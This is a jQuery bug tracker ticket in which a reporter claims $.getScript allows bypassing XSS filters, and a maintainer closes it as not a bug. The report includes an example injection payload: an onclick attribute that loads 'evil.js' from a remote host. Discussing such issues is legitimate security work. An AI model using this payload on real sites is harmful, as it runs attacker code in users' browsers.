Bug Tracker

Opened 5 years ago

Closed 5 years ago

#15166 closed bug (notabug)

$.getScript Function may cause XSS attack

Reported by: lupin Owned by:
Priority: high Milestone: None
Component: ajax Version: 1.11.1
Keywords: getScript Cc:
Blocked by: Blocking:

Description

$.getScript and can load JavaScript file from remote server,then execute it.

In some cases,if a attack can control this function or its parameter,this Function may cause XSS attack.

For example,if an attacker can control a HTML TAG (such as input tag).

<input type=text onclick=...>

An attacker can control the OnClick Event,but the web app filter evil characters(<script>,doucment...).In this case XSS can not occur,but if the web page contains JQuery library,the attacker can bypass the Filter Mechanism using $.getScript Function,like this.

<input type=text onclick=$.getScript('http://jquery.com/evil.js')>

The attacker put evil.js on his remote server,this JavaScript File contains evil JavaScript code.When a user click the input tag ,the evil javascript code will execute.

I think JQuery Libiary should add a white list,a web can only load a JavaScript File from current domain by default,if a web need to load a JavaScript File from remote server,the developer have to add the domain into the white list.

Change History (1)

comment:1 Changed 5 years ago by dmethvin

Resolution: notabug
Status: newclosed

This is an "airtight hatchway" problem. If an attacker has the ability to run $.getScript they can run any script. If an attacker has the ability to inject arbitrary HTML in some way then the developer has made a mistake already.

web can only load a JavaScript File from current domain by default,if a web need to load a JavaScript File from remote server,the developer have to add the domain into the white list

Wouldn't the onclick attribute just add itself to the whitelist before calling $.getScript then?

Sorry but $.getScript is intended to get scripts, including ones from other origins. It's done that for years. We can't add hurdles that would break a lot of existing code to

Note: See TracTickets for help on using tickets.